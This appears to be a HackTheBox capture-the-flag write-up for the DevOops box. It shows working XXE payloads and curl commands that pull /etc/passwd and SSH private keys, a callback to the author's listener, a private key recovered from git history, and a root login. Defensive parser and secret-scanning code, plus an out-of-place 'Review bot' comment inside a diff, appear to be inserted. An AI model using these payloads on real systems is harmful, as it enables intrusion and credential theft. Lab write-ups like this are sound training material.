HackTheBox DevOops Write-Up

Spoiler alert: this is a write-up for the DevOops box that you can find on HackTheBox. If you haven’t done it yet and may want to in the future, you definitely don’t want to read this right now.

Alright, let’s kick that one off as usual with a quick nmap scan:

$ nmap -A 10.10.10.91

Starting Nmap 7.01 ( https://nmap.org ) at 2018-07-06 06:10 CEST
Nmap scan report for 10.10.10.91
Host is up (0.042s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 42:90:e3:35:31:8d:8b:86:17:2a:fb:38:90:da:c4:95 (RSA)
|_  256 b7:b6:dc:c4:4c:87:9b:75:2a:00:89:83:ed:b2:80:31 (ECDSA)
5000/tcp open  http    Gunicorn 19.7.1
|_http-server-header: gunicorn/19.7.1
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.29 seconds

So what do I have? SSH running on the standard port and what looks like an HTTP server on TCP port 5000. For information, Gunicorn is a Python WSGI HTTP server: basically it runs Python web applications and serves them over HTTP.
The full port scan doesn’t give me anything more.

The website looks like a basic blog.

I run nikto and gobuster on it to check if there’s some interesting URLs:

$ docker run frapsoft/nikto -host 10.10.10.91 -port 5000
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          10.10.10.91
+ Target Hostname:    10.10.10.91
+ Target Port:        5000
+ Start Time:         2018-07-06 04:30:58 (GMT0)
---------------------------------------------------------------------------
+ Server: gunicorn/19.7.1
+ The anti-clickjacking X-Frame-Options header is not present.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: HEAD, OPTIONS, GET 
+ 6544 items checked: 0 error(s) and 2 item(s) reported on remote host
+ End Time:           2018-07-06 04:39:04 (GMT0) (486 seconds)
---------------------------------------------------------------------------
+ 1 host(s) teste
$ docker run --rm -v $PWD/../SecLists/Discovery/Web-Content:/wl devalias/gobuster -w /wl/big.txt -u http://10.10.10.91:5000
Gobuster v1.3                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.91:5000/
[+] Threads      : 10
[+] Wordlist     : /words/big.txt
[+] Status codes : 301,302,307,200,204
=====================================================
/feed (Status: 200)
/upload (Status: 200)
=====================================================
  • /feed is just the image on the homepage.
  • /upload is a test API to upload XML files, for blog posts it seems.

I first try to upload a Python reverse shell: no errors but no connect back either.
Then I try a simple XML file following the notes I found (XML elements: Author, Subject, Content):

<?xml version="1.0" ?>
<Author>Test McTest</Author>
<Subject>This is a test</Subject>
<Content>My wonderful content</Content>

I get back an HTTP 500 error. Hmmm. That feature to upload XML files makes me think of XXE. I read up a bit more about it on the OWASP wiki and check if I can get some file disclosure:

<?xml version="1.0" encoding="ISO-8859-1"?>
  <!DOCTYPE foo [  
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///dev/random" >]><foo>&xxe;</foo>

It hangs for a while and then I get another 500 error so it seems to be parsing it and doing something more than before. I’ll make it connect back to my laptop to check it is really alive:

<?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [  
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "http://10.10.14.10:4444/alive" >]><foo>&xxe;</foo>

And in my netcat listener:

$ nc -lvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from [10.10.10.91] port 4444 [tcp/*] accepted (family 2, sport 40112)
GET /alive HTTP/1.0
Host: 10.10.14.10:4444
User-Agent: Python-urllib/1.17

So I know that XML entities get processed and that the script processing them can reach external resources via HTTP. I go through a lot of different variations of XXE but can’t get the parser to evaluate the remote DTD I’m providing.

Back to the basics: I aim at getting my input processed properly first, so I can work off of that. Basically what was missing in my first attempt was a root XML element. First facepalm!

<?xml version="1.0" ?>
<Item>
  <Author>Test McTest</Author>
  <Subject>This is a test</Subject>
  <Content>My wonderful content</Content>
</Item>

When I post it with curl:

$ curl -X POST http://10.10.10.91:5000/upload -F file=@test.xml -D -
HTTP/1.1 100 Continue

HTTP/1.1 200 OK
Server: gunicorn/19.7.1
Date: Sun, 08 Jul 2018 13:27:09 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 183

 PROCESSED BLOGPOST: 
  Author: Test McTest
 Subject: This is a test
 Content: My wonderful content
 URL for later reference: /uploads/test.xml
 File path: /home/roosa/deploy/src

I get a proper response and a lot of info right there! Now I can get back to experimenting with XXE as I have a feedback channel.

<?xml version="1.0" ?>
<!DOCTYPE Content [
<!ELEMENT Content ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<Item>
  <Author>Test McTest</Author>
  <Subject>This is a test</Subject>
  <Content>&xxe;</Content>
</Item>

And I get back exactly what I wanted:

$ curl -X POST http://10.10.10.91:5000/upload -F file=@xxe.xml -D -
HTTP/1.1 100 Continue

HTTP/1.1 200 OK
Server: gunicorn/19.7.1
Date: Mon, 09 Jul 2018 04:20:53 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 2601

 PROCESSED BLOGPOST: 
  Author: Test McTest
 Subject: This is a test
 Content: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
osboxes:x:1000:1000:osboxes.org,,,:/home/osboxes:/bin/false
git:x:1001:1001:git,,,:/home/git:/bin/bash
roosa:x:1002:1002:,,,:/home/roosa:/bin/bash
sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin
blogfeed:x:1003:1003:,,,:/home/blogfeed:/bin/false

 URL for later reference: /uploads/xxe.xml
 File path: /home/roosa/deploy/src

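To make the difference between the parser behaviour I hit here and a safe one concrete, here is an added example (my own code, not the DevOops application’s, whose source I never saw at this point): a minimal blog-post upload parser written twice with the Python standard library. The Item/Author/Subject/Content element names and the payload shape are the ones from this write-up; the "secret" file it reads is a constructed temp file, so it runs offline. The permissive variant explicitly turns on external general entity resolution in xml.sax, the hardened one refuses any DOCTYPE up front and parses with ElementTree, which never fetches external entities.

```python
import io
import os
import tempfile
import xml.etree.ElementTree as ET
import xml.sax
from xml.sax.handler import feature_external_ges

FIELDS = ("Author", "Subject", "Content")
# Constructed stand-in for the file the write-up pulled back; not a real secret.
SECRET = "constructed secret: root:x:0:0:root:/root:/bin/bash\n"


class _ItemHandler(xml.sax.ContentHandler):
    """Collects the text of the three blog-post fields."""

    def __init__(self):
        super().__init__()
        self.fields = {}
        self._current = None

    def startElement(self, name, attrs):
        if name in FIELDS:
            self._current = name
            self.fields[name] = ""

    def characters(self, content):
        if self._current is not None:
            self.fields[self._current] += content

    def endElement(self, name):
        if name == self._current:
            self._current = None


def parse_permissive(xml_bytes):
    """Vulnerable variant: with external general entities enabled, a SYSTEM
    entity declared in the DOCTYPE is replaced by the file it names and the
    text ends up in the echoed Content field, which is the feedback channel
    the write-up used."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, True)  # the dangerous setting
    handler = _ItemHandler()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.fields


def parse_hardened(xml_bytes):
    """Hardened variant: any upload carrying a DOCTYPE (and so any entity
    declaration) is refused up front, and ElementTree, which does not fetch
    external entities, does the parsing. The byte check is a cheap first gate
    on top of a safe parser, not a substitute for one."""
    if b"<!DOCTYPE" in xml_bytes or b"<!ENTITY" in xml_bytes:
        raise ValueError("DOCTYPE and ENTITY declarations are not accepted")
    root = ET.fromstring(xml_bytes)
    if root.tag != "Item":
        raise ValueError("root element must be <Item>")
    return {f: (root.findtext(f) or "") for f in FIELDS}


def xxe_payload(path):
    """Same shape as the write-up's payload, pointed at a path of our choosing."""
    return (
        '<?xml version="1.0" ?>\n<!DOCTYPE Content [\n<!ELEMENT Content ANY >\n'
        f'<!ENTITY xxe SYSTEM "file://{path}">\n]>\n<Item>\n'
        "  <Author>Test McTest</Author>\n  <Subject>This is a test</Subject>\n"
        "  <Content>&xxe;</Content>\n</Item>\n"
    ).encode()


BENIGN = (
    '<?xml version="1.0" ?>\n<Item>\n  <Author>Test McTest</Author>\n'
    "  <Subject>This is a test</Subject>\n"
    "  <Content>My wonderful content</Content>\n</Item>\n"
).encode()


def demo():
    """Feed the XXE upload to both parsers; returns what each one did."""
    fd, path = tempfile.mkstemp(prefix="constructed-secret-")
    try:
        with os.fdopen(fd, "w") as fh:
            fh.write(SECRET)
        payload = xxe_payload(path)
        leaked = parse_permissive(payload)["Content"]
        try:
            parse_hardened(payload)
            blocked = False
        except ValueError:
            blocked = True
    finally:
        os.unlink(path)
    return {"permissive_leaks_file": leaked == SECRET,
            "hardened_blocks_xxe": blocked}


if __name__ == "__main__":
    print(demo())
    print(parse_hardened(BENIGN))
```

Both variants return the same dictionary for a well-formed post, so the hardening costs nothing functionally; only the upload carrying a DOCTYPE is treated differently. Refusing the DOCTYPE outright is the simplest rule for an endpoint that only ever expects three plain elements, and it also removes internal entity expansion (billion laughs) from the attack surface.
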
So I’ve got two users with shell access: git and roosa. Let’s poke around. I change my xxe.xml file to get me the content of /home/roosa/.ssh/authorized_keys in case SSH public key auth is set up:

$ curl -X POST http://10.10.10.91:5000/upload -F file=@xxe.xml -D -
HTTP/1.1 100 Continue

HTTP/1.1 200 OK
Server: gunicorn/19.7.1
Date: Mon, 09 Jul 2018 04:24:47 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 556

 PROCESSED BLOGPOST: 
  Author: Test McTest
 Subject: This is a test
 Content: ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC4wy3iqH+JvzrEkEubN4+Xr/llE0mRSP9e6/X53qdxxN99v/v2wheFraHhrh+nXwXneN3Hc+oQ7scBeWzMCUG8Z2DreL4vFaa7ynkGtOYQ+X5xDglH9H57E2CAe6qynyutwer3qVte05HLxI6WJSN+yk+xZ9jsluS0rJpArQm6dHbmNWS/liEZV7JpM2ZI09OWlkJUZUCnVGi1Z1z/R7HurOerjnAtva1kUYTTGZhN5eChpfj1AhBCeiLoM/f7sStBJ3pAZOrmYK+zOmdNSybAWPklF2GMazO3TMEaWWxWf3073Qqbek3xI3XJYJNqXoUtSK7FeD31hJXS0SXSt9JT roosa@gitter

 URL for later reference: /uploads/xxe.xml
 File path: /home/roosa/deploy/src

And yes, there it is! But git’s is not:

$ curl -X POST http://10.10.10.91:5000/upload -F file=@xxe.xml -D -
HTTP/1.1 100 Continue

curl: (52) Empty reply from server

I check that the default SSH key /home/roosa/.ssh/id_rsa.pub is the one used to login:

$ curl -X POST http://10.10.10.91:5000/upload -F file=@xxe.xml -D -
HTTP/1.1 100 Continue

HTTP/1.1 200 OK
Server: gunicorn/19.7.1
Date: Mon, 09 Jul 2018 04:25:50 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 556

 PROCESSED BLOGPOST: 
  Author: Test McTest
 Subject: This is a test
 Content: ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC4wy3iqH+JvzrEkEubN4+Xr/llE0mRSP9e6/X53qdxxN99v/v2wheFraHhrh+nXwXneN3Hc+oQ7scBeWzMCUG8Z2DreL4vFaa7ynkGtOYQ+X5xDglH9H57E2CAe6qynyutwer3qVte05HLxI6WJSN+yk+xZ9jsluS0rJpArQm6dHbmNWS/liEZV7JpM2ZI09OWlkJUZUCnVGi1Z1z/R7HurOerjnAtva1kUYTTGZhN5eChpfj1AhBCeiLoM/f7sStBJ3pAZOrmYK+zOmdNSybAWPklF2GMazO3TMEaWWxWf3073Qqbek3xI3XJYJNqXoUtSK7FeD31hJXS0SXSt9JT roosa@gitter

 URL for later reference: /uploads/xxe.xml
 File path: /home/roosa/deploy/src

Sweet! So I grab the private key /home/roosa/.ssh/id_rsa:

$ curl -X POST http://10.10.10.91:5000/upload -F file=@xxe.xml -D -
HTTP/1.1 100 Continue

HTTP/1.1 200 OK
Server: gunicorn/19.7.1
Date: Mon, 09 Jul 2018 04:26:04 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1837

 PROCESSED BLOGPOST: 
  Author: Test McTest
 Subject: This is a test
 Content: -----BEGIN RSA PRIVATE KEY-----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-----END RSA PRIVATE KEY-----

 URL for later reference: /uploads/xxe.xml
 File path: /home/roosa/deploy/src

And save it to a local file so I can use it to log in remotely:

$ chmod 600 id_roosa 
$ ssh -i id_roosa roosa@10.10.10.91
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.13.0-37-generic i686)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

135 packages can be updated.
60 updates are security updates.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

roosa@gitter:~$ id
uid=1002(roosa) gid=1002(roosa) groups=1002(roosa),4(adm),27(sudo)
roosa@gitter:~$ ls
deploy  Desktop  Documents  Downloads  examples.desktop  Music  Pictures  Public  run-blogfeed.sh  service.sh  service.sh~  Templates  user.txt  Videos  work
roosa@gitter:~$ cat user.txt 
c580************************c67b

Great I now have a proper shell on the machine. Let’s do some recon.
First I notice that the user is a member of the sudo group so I check what it can do with it:

roosa@gitter:~$ sudo -l
sudo: unable to resolve host gitter: Connection timed out
[sudo] password for roosa: 
roosa@gitter:~$

Bummer, it asks for a password… OK, we’ll have to work a bit more then.
Enumeration, here I come.
There are some scripts to run the blogfeed app:

  • run-blogfeed.sh seems to be used by roosa
  • service.sh and the temp file service.sh~ look like an init script
  • deploy/run-gunicorn.sh is called by /etc/init.d/blogfeed

/etc/init.d/blogfeed is running things as roosa so it won’t really help me to elevate my privileges.

There are two copies of the blogfeed source, in /home/roosa/deploy and /home/roosa/work.
Source code usually equals loot and I quickly find something interesting:

$ cat /home/roosa/deploy/resources/integration/authcredentials.key 
-----BEGIN RSA PRIVATE KEY-----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-----END RSA PRIVATE KEY-----

It looks like an SSH private key.
I also notice that /home/roosa/work/blogfeed is a git repo, so I have a look at the commit log:

$ git log
commit 7ff507d029021b0915235ff91e6a74ba33009c6d
Author: Roosa Hakkerson <roosa@solita.fi>
Date:   Mon Mar 26 06:13:55 2018 -0400

    Use Base64 for pickle feed loading

commit 26ae6c8668995b2f09bf9e2809c36b156207bfa8
Author: Roosa Hakkerson <roosa@solita.fi>
Date:   Tue Mar 20 15:37:00 2018 -0400

    Set PIN to make debugging faster as it will no longer change every time the application code is changed. Remember to remove before production use.

commit cec54d8cb6117fd7f164db142f0348a74d3e9a70
Author: Roosa Hakkerson <roosa@solita.fi>
Date:   Tue Mar 20 15:08:09 2018 -0400

    Debug support added to make development more agile.

commit ca3e768f2434511e75bd5137593895bd38e1b1c2
Author: Roosa Hakkerson <roosa@solita.fi>
Date:   Tue Mar 20 08:38:21 2018 -0400

    Blogfeed app, initial version.

commit dfebfdfd9146c98432d19e3f7d83cc5f3adbfe94
Author: Roosa Hakkerson <roosa@solita.fi>
Date:   Tue Mar 20 08:37:56 2018 -0400

    Gunicorn startup script

commit 33e87c312c08735a02fa9c796021a4a3023129ad
Author: Roosa Hakkerson <roosa@solita.fi>
Date:   Mon Mar 19 09:33:06 2018 -0400

    reverted accidental commit with proper key

commit d387abf63e05c9628a59195cec9311751bdb283f
Author: Roosa Hakkerson <roosa@solita.fi>
Date:   Mon Mar 19 09:32:03 2018 -0400

    add key for feed integration from tnerprise backend

commit 1422e5a04d1b52a44e6dc81023420347e257ee5f
Author: Roosa Hakkerson <roosa@solita.fi>
Date:   Mon Mar 19 09:24:30 2018 -0400

    Initial commit

It seems some credentials have been accidentally committed to git and then overwritten in a following commit.
Let’s get them back:

$ git diff 1422e5a04d1b52a44e6dc81023420347e257ee5f d387abf63e05c9628a59195cec9311751bdb283f
diff --git a/resources/integration/authcredentials.key b/resources/integration/authcredentials.key
new file mode 100644
index 0000000..44c981f
--- /dev/null
+++ b/resources/integration/authcredentials.key
@@ -0,0 +1,28 @@
+-----BEGIN RSA PRIVATE KEY-----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+-----END RSA PRIVATE KEY-----
+
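Review bot: a private key is being committed here (resources/integration/authcredentials.key, a new file whose first added line is `-----BEGIN RSA PRIVATE KEY-----`), and the follow-up commit 33e87c3 "reverted accidental commit with proper key" does not undo that, since this very diff between 1422e5a and d387abf still yields the key. Once pushed, the key has to be treated as compromised and rotated, and the history rewritten or the repository recreated; a pre-commit or CI check that rejects added lines matching a PEM private-key header would have caught this before it landed.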

Great another private key for my collection!
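Since deleting a secret in a later commit leaves it fully recoverable from history, the defender’s check is to scan the history, not the working tree. Here is an added example of such a scan (my own code, not from the blogfeed repo): it walks `git log -p` output, records every added or removed line carrying a PEM private-key header, and reports per file where the key entered history and whether a later commit merely deleted it. The sample log is constructed here: the commit ids, path and messages are the ones from the log above, the key body is a placeholder, and the "revert" is assumed to delete the file.

```python
import re

# Matches any PEM private-key header (RSA, EC, OPENSSH, unlabelled ...).
KEY_HEADER = re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----")

# Constructed `git log -p --reverse` output (oldest commit first) modelled on
# the history in the write-up; the commit ids and path are the write-up's,
# the key body is a placeholder, and the "revert" is assumed to delete the file.
SAMPLE_LOG = """\
commit d387abf63e05c9628a59195cec9311751bdb283f
Author: Roosa Hakkerson <roosa@solita.fi>

    add key for feed integration from tnerprise backend

diff --git a/resources/integration/authcredentials.key b/resources/integration/authcredentials.key
new file mode 100644
--- /dev/null
+++ b/resources/integration/authcredentials.key
@@ -0,0 +1,3 @@
+-----BEGIN RSA PRIVATE KEY-----
+PLACEHOLDER-KEY-BODY-NOT-A-REAL-KEY
+-----END RSA PRIVATE KEY-----

commit 33e87c312c08735a02fa9c796021a4a3023129ad
Author: Roosa Hakkerson <roosa@solita.fi>

    reverted accidental commit with proper key

diff --git a/resources/integration/authcredentials.key b/resources/integration/authcredentials.key
deleted file mode 100644
--- a/resources/integration/authcredentials.key
+++ /dev/null
@@ -1,3 +0,0 @@
------BEGIN RSA PRIVATE KEY-----
-PLACEHOLDER-KEY-BODY-NOT-A-REAL-KEY
------END RSA PRIVATE KEY-----
"""


def scan_git_log(log_text):
    """Walk `git log -p` output and record every added or removed line that
    carries a private-key header, tagged with its commit and file."""
    findings = []
    commit = path = None
    for line in log_text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1]
        elif line.startswith("diff --git "):
            path = line.split(" b/", 1)[1]
        elif line.startswith(("+++ ", "--- ")):
            continue  # file headers, not content
        elif line[:1] in ("+", "-") and KEY_HEADER.search(line):
            findings.append({"commit": commit, "path": path,
                             "action": "added" if line[0] == "+" else "removed"})
    return findings


def summarize(findings):
    """Per file: the commit that introduced the key and the one (if any) that
    deleted it. A deletion only hides the key from the working tree; it stays
    reachable with `git diff`/`git show` on the old commits, so the key has to
    be rotated and the history rewritten."""
    summary = {}
    for f in findings:
        entry = summary.setdefault(f["path"], {"added_in": None, "removed_in": None})
        slot = "added_in" if f["action"] == "added" else "removed_in"
        if entry[slot] is None:
            entry[slot] = f["commit"]
    for entry in summary.values():
        entry["still_in_history"] = entry["added_in"] is not None
    return summary


if __name__ == "__main__":
    for path, info in summarize(scan_git_log(SAMPLE_LOG)).items():
        print(path, info)
```

On a real repository the input would come from `git log -p --all --reverse` so that branches and tags are covered too; the point the summary makes is that `removed_in` being set changes nothing about `still_in_history`.
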

I use LinEnum.sh to get more info on the system and that’s where I lost myself…
I see that git and root have also logged in at one point. git logged in from localhost.
The blogfeed user may also be interesting, I make a note to come back to it later.
Apart from roosa, syslog and osboxes are members of adm. osboxes is sudo as well.
That user refers to https://www.osboxes.org/ and was probably used to set up the box initially. I’m not sure it will be of any use.
I can read the $HOME dirs of:

  • git
  • osboxes
  • blogfeed

roosa has a Gnome keyring in /home/roosa/.local/share/keyrings/login.keyring and /home/roosa/.local/share/keyrings/user.keystore
I’ll check it as well as its known_hosts, .gitconfig, bash history and ssh-agent.
Also the blogfeed app logs to /var/log/blogfeed.log.

On the networking side, the following ports are open:

  • localhost only:
    • 631/tcp
  • on all interfaces:
    • 631/tcp6
    • 631/udp
    • 5353/udp
    • 49447/udp
    • 59745/udp6

As for the processes, I have nothing really interesting.

Looking at the roosa user’s history, he logged in as git locally with SSH.
Let’s try that with the SSH keys I found: each time it is asking for a password.
I also give it a try as root.

$ ssh -i id root@localhost
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.13.0-37-generic i686)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

135 packages can be updated.
60 updates are security updates.

Last login: Mon Mar 26 06:23:48 2018 from 192.168.57.1
root@gitter:~# id
uid=0(root) gid=0(root) groups=0(root)
root@gitter:~# ls
root.txt
root@gitter:~# cat root.txt 
d4fe************************c7b3

Out of nowhere, it almost surprised me! :) And then thinking back about it that’s another BIIIIG facepalm as I had the credentials for a while before I even tried them…

All in all this wasn’t such a hard box (only 2 facepalms, see). Again what I recognise as my lack of established methodology gave me a hard time when I should have finished it way earlier. Anyway, like always, there are things to learn from this:

  • When testing input: try a valid one first then try to break it and get an error, and then try to make it valid again but with the behavior you’re looking for. In that case: a valid XML doc, then try different XXE techniques until the server sends back something else than an error.
  • Try credentials everywhere you can the minute you get them. It can really help speed up your progress.

That was a fairly short one this time but I hope it was interesting nonetheless and that you got something from it.

Till next time!